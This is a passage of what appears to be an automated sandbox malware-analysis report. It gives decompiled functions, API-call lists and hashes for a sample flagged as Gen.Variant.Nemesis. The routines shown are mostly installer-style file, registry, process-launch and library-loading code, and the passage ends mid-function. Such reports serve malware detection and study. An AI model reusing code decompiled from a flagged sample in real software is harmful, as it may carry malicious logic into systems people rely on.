                                                                        • Opcode ID: 01a9829512de6273efdd0b4c9d9d4bf512c8918dbca03b62d64ae39b8f0ee175
                                                                        • Instruction ID: d1bec18424e581e1e6b0bc8b24d99e54b3d5c17347d20e7f86cfdfa42b4dd4be
                                                                        • Opcode Fuzzy Hash: 01a9829512de6273efdd0b4c9d9d4bf512c8918dbca03b62d64ae39b8f0ee175
                                                                        • Instruction Fuzzy Hash: 8FF0AEB2A85281DED359CF2B84457093FE0B76A305B354E2EE1C8FA241E3344046DF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                        				long _v8;
                                                                        				long _t21;
                                                                        				long _t22;
                                                                        				void* _t24;
                                                                        				long _t26;
                                                                        				int _t27;
                                                                        				long _t28;
                                                                        				void* _t30;
                                                                        				long _t31;
                                                                        				long _t32;
                                                                        				long _t36;
                                                                        
                                                                        				_t21 = _a4;
                                                                        				if(_t21 >= 0) {
                                                                        					_t32 = _t21 +  *0x42a2b8;
                                                                        					 *0x420ef4 = _t32;
                                                                        					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                        				}
                                                                        				_t22 = E00403479(4);
                                                                        				if(_t22 >= 0) {
                                                                        					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                        					if(_t24 == 0) {
                                                                        						L18:
                                                                        						_push(0xfffffffd);
                                                                        						goto L19;
                                                                        					} else {
                                                                        						 *0x420ef4 =  *0x420ef4 + 4;
                                                                        						_t36 = E00403479(_a4);
                                                                        						if(_t36 < 0) {
                                                                        							L21:
                                                                        							_t22 = _t36;
                                                                        						} else {
                                                                        							if(_a12 != 0) {
                                                                        								_t26 = _a4;
                                                                        								if(_t26 >= _a16) {
                                                                        									_t26 = _a16;
                                                                        								}
                                                                        								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                        								if(_t27 != 0) {
                                                                        									_t36 = _v8;
                                                                        									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                        									goto L21;
                                                                        								} else {
                                                                        									goto L18;
                                                                        								}
                                                                        							} else {
                                                                        								if(_a4 <= 0) {
                                                                        									goto L21;
                                                                        								} else {
                                                                        									while(1) {
                                                                        										_t28 = _a4;
                                                                        										if(_a4 >= 0x4000) {
                                                                        											_t28 = 0x4000;
                                                                        										}
                                                                        										_v8 = _t28;
                                                                        										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
                                                                        											goto L18;
                                                                        										}
                                                                        										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                        										if(_t30 == 0) {
                                                                        											_push(0xfffffffe);
                                                                        											L19:
                                                                        											_pop(_t22);
                                                                        										} else {
                                                                        											_t31 = _v8;
                                                                        											_a4 = _a4 - _t31;
                                                                        											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                        											_t36 = _t36 + _t31;
                                                                        											if(_a4 > 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L21;
                                                                        											}
                                                                        										}
                                                                        										goto L22;
                                                                        									}
                                                                        									goto L18;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L22:
                                                                        				return _t22;
                                                                        			}














                                                                        0x00403375
                                                                        0x0040337e
                                                                        0x00403387
                                                                        0x0040338b
                                                                        0x00403396
                                                                        0x00403396
                                                                        0x0040339e
                                                                        0x004033a5
                                                                        0x004033b7
                                                                        0x004033be
                                                                        0x00403463
                                                                        0x00403463
                                                                        0x00000000
                                                                        0x004033c4
                                                                        0x004033c7
                                                                        0x004033d3
                                                                        0x004033d7
                                                                        0x00403471
                                                                        0x00403471
                                                                        0x004033dd
                                                                        0x004033e0
                                                                        0x0040343f
                                                                        0x00403445
                                                                        0x00403447
                                                                        0x00403447
                                                                        0x00403459
                                                                        0x00403461
                                                                        0x00403468
                                                                        0x0040346b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004033e2
                                                                        0x004033e5
                                                                        0x00000000
                                                                        0x004033eb
                                                                        0x004033f0
                                                                        0x004033f7
                                                                        0x004033fa
                                                                        0x004033fc
                                                                        0x004033fc
                                                                        0x00403409
                                                                        0x00403413
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040341c
                                                                        0x00403423
                                                                        0x0040343b
                                                                        0x00403465
                                                                        0x00403465
                                                                        0x00403425
                                                                        0x00403425
                                                                        0x00403428
                                                                        0x0040342b
                                                                        0x00403431
                                                                        0x00403437
                                                                        0x00000000
                                                                        0x00403439
                                                                        0x00000000
                                                                        0x00403439
                                                                        0x00403437
                                                                        0x00000000
                                                                        0x00403423
                                                                        0x00000000
                                                                        0x004033f0
                                                                        0x004033e5
                                                                        0x004033e0
                                                                        0x004033d7
                                                                        0x004033be
                                                                        0x00403473
                                                                        0x00403476

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                        • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                        • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                        • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E0040252A(int* __ebx, char* __edi) {
                                                                        				void* _t17;
                                                                        				short* _t18;
                                                                        				void* _t35;
                                                                        				void* _t37;
                                                                        				void* _t40;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                        				_t35 = _t17;
                                                                        				_t18 = E00402DA6(0x33);
                                                                        				 *__edi = __ebx;
                                                                        				if(_t35 == __ebx) {
                                                                        					 *(_t37 - 4) = 1;
                                                                        				} else {
                                                                        					 *(_t37 - 0x10) = 0x800;
                                                                        					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                        						L7:
                                                                        						 *_t33 = _t27;
                                                                        						 *(_t37 - 4) = 1;
                                                                        					} else {
                                                                        						if( *(_t37 + 8) == 4) {
                                                                        							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                        							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                        							E004065AF(__edi,  *__edi);
                                                                        						} else {
                                                                        							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                        								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                        								_t33[0x7fe] = _t27;
                                                                        							} else {
                                                                        								goto L7;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_push(_t35); // executed
                                                                        					RegCloseKey(); // executed
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                        				return 0;
                                                                        			}








                                                                        0x0040252a
                                                                        0x0040252a
                                                                        0x0040252f
                                                                        0x00402536
                                                                        0x00402538
                                                                        0x0040253f
                                                                        0x00402542
                                                                        0x0040292e
                                                                        0x00402548
                                                                        0x0040254b
                                                                        0x00402566
                                                                        0x00402596
                                                                        0x00402596
                                                                        0x00402599
                                                                        0x00402568
                                                                        0x0040256c
                                                                        0x00402585
                                                                        0x0040258c
                                                                        0x0040258f
                                                                        0x0040256e
                                                                        0x00402571
                                                                        0x0040257c
                                                                        0x004025f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402571
                                                                        0x0040256c
                                                                        0x004025fc
                                                                        0x004025fd
                                                                        0x004025fd
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3356406503-0
                                                                        • Opcode ID: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
                                                                        • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                        • Opcode Fuzzy Hash: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
                                                                        • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E00401389(signed int _a4, struct HWND__* _a10) {
                                                                        				intOrPtr* _t6;
                                                                        				void* _t8;
                                                                        				void* _t10;
                                                                        				signed int _t11;
                                                                        				void* _t12;
                                                                        				signed int _t16;
                                                                        				signed int _t17;
                                                                        
                                                                        				_t17 = _a4;
                                                                        				while(_t17 >= 0) {
                                                                        					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                        					if( *_t6 == 1) {
                                                                        						break;
                                                                        					}
                                                                        					_push(_t6); // executed
                                                                        					_t8 = E00401434(); // executed
                                                                        					if(_t8 == 0x7fffffff) {
                                                                        						return 0x7fffffff;
                                                                        					}
                                                                        					_t10 = E0040136D(_t8);
                                                                        					if(_t10 != 0) {
                                                                        						_t11 = _t10 - 1;
                                                                        						_t16 = _t17;
                                                                        						_t17 = _t11;
                                                                        						_t12 = _t11 - _t16;
                                                                        					} else {
                                                                        						_t12 = _t10 + 1;
                                                                        						_t17 = _t17 + 1;
                                                                        					}
                                                                        					if(_a10 != 0) {
                                                                        						 *0x42924c =  *0x42924c + _t12;
                                                                        						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
                                                                        					}
                                                                        				}
                                                                        				return 0;
                                                                        			}










                                                                        0x0040138a
                                                                        0x004013fa
                                                                        0x0040139b
                                                                        0x004013a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004013a2
                                                                        0x004013a3
                                                                        0x004013ad
                                                                        0x00000000
                                                                        0x00401404
                                                                        0x004013b0
                                                                        0x004013b7
                                                                        0x004013bd
                                                                        0x004013be
                                                                        0x004013c0
                                                                        0x004013c2
                                                                        0x004013b9
                                                                        0x004013b9
                                                                        0x004013ba
                                                                        0x004013ba
                                                                        0x004013c9
                                                                        0x004013cb
                                                                        0x004013f4
                                                                        0x004013f4
                                                                        0x004013c9
                                                                        0x00000000

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                        • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                        • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                        • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402434(void* __ebx) {
                                                                        				long _t7;
                                                                        				void* _t14;
                                                                        				long _t18;
                                                                        				intOrPtr _t20;
                                                                        				void* _t22;
                                                                        				void* _t23;
                                                                        
                                                                        				_t14 = __ebx;
                                                                        				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                        				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                        				if( *(_t23 - 0x20) != __ebx) {
                                                                        					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                        					_t18 = _t7;
                                                                        					goto L4;
                                                                        				} else {
                                                                        					_t22 = E00402DE6(_t26, 2);
                                                                        					if(_t22 == __ebx) {
                                                                        						L6:
                                                                        						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                        					} else {
                                                                        						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                        						RegCloseKey(_t22);
                                                                        						L4:
                                                                        						if(_t18 != _t14) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
                                                                        				return 0;
                                                                        			}









                                                                        0x00402434
                                                                        0x00402434
                                                                        0x00402437
                                                                        0x0040243a
                                                                        0x00402476
                                                                        0x0040247b
                                                                        0x00000000
                                                                        0x0040243c
                                                                        0x00402443
                                                                        0x00402447
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x0040244d
                                                                        0x0040245d
                                                                        0x0040245f
                                                                        0x0040247d
                                                                        0x0040247f
                                                                        0x00000000
                                                                        0x00402485
                                                                        0x0040247f
                                                                        0x00402447
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteValue
                                                                        • String ID:
                                                                        • API String ID: 2831762973-0
                                                                        • Opcode ID: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
                                                                        • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                        • Opcode Fuzzy Hash: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
                                                                        • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableShow
                                                                        • String ID:
                                                                        • API String ID: 1136574915-0
                                                                        • Opcode ID: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
                                                                        • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                        • Opcode Fuzzy Hash: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
                                                                        • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405C4B(WCHAR* _a4) {
                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                        				int _t7;
                                                                        
                                                                        				0x426750->cb = 0x44;
                                                                        				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                        				if(_t7 != 0) {
                                                                        					CloseHandle(_v20.hThread);
                                                                        					return _v20.hProcess;
                                                                        				}
                                                                        				return _t7;
                                                                        			}





                                                                        0x00405c54
                                                                        0x00405c74
                                                                        0x00405c7c
                                                                        0x00405c81
                                                                        0x00000000
                                                                        0x00405c87
                                                                        0x00405c8b

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3712363035-0
                                                                        • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                        • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                        • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                        • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406A35(signed int _a4) {
                                                                        				struct HINSTANCE__* _t5;
                                                                        				signed int _t10;
                                                                        
                                                                        				_t10 = _a4 << 3;
                                                                        				_t8 =  *(_t10 + 0x40a410);
                                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                        				if(_t5 != 0) {
                                                                        					L2:
                                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                        				}
                                                                        				_t5 = E004069C5(_t8); // executed
                                                                        				if(_t5 == 0) {
                                                                        					return 0;
                                                                        				}
                                                                        				goto L2;
                                                                        			}





                                                                        0x00406a3d
                                                                        0x00406a40
                                                                        0x00406a47
                                                                        0x00406a4f
                                                                        0x00406a5b
                                                                        0x00000000
                                                                        0x00406a62
                                                                        0x00406a52
                                                                        0x00406a59
                                                                        0x00000000
                                                                        0x00406a6a
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                          • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                          • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                          • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                        • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                        • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                        				signed int _t5;
                                                                        				void* _t6;
                                                                        
                                                                        				_t5 = GetFileAttributesW(_a4); // executed
                                                                        				asm("sbb ecx, ecx");
                                                                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                        				return _t6;
                                                                        			}





                                                                        0x0040615c
                                                                        0x00406169
                                                                        0x0040617e
                                                                        0x00406184

                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 0040615C
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406133(WCHAR* _a4) {
                                                                        				signed char _t3;
                                                                        				signed char _t7;
                                                                        
                                                                        				_t3 = GetFileAttributesW(_a4); // executed
                                                                        				_t7 = _t3;
                                                                        				if(_t7 != 0xffffffff) {
